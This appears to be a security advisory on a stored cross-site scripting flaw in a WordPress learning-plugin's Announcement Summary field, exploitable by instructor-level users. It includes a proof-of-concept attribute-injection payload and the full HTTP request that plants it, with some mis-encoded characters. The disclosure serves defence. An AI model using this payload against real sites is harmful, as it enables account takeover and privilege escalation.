The plugin did not escape the Summary field of Announcements (when outputting it in an attribute), which can be created by users as low as Tutor Instructor. This lead to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list, and could result in privilege escalation when viewed by an admin.
As a Tutor Instructor, Create an Announcement and put the following payload in the Summary field: " style=βanimation-name:rotationβ onanimationstart="alert(/XSS/)// POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 341 Connection: close Cookie: [Tutor Instructor+] _tutor_nonce=52e764441f&tutor;_announcement_course=973&tutor;_announcement_title=Test+Inst+XSS&tutor;_announcement_summary=%22+style%3D%22animation-name%3Arotation%22+onanimationstart%3D%22alert(%2FXSS%2F)%2F%2F&action;=tutor_announcement_create&action;_type=create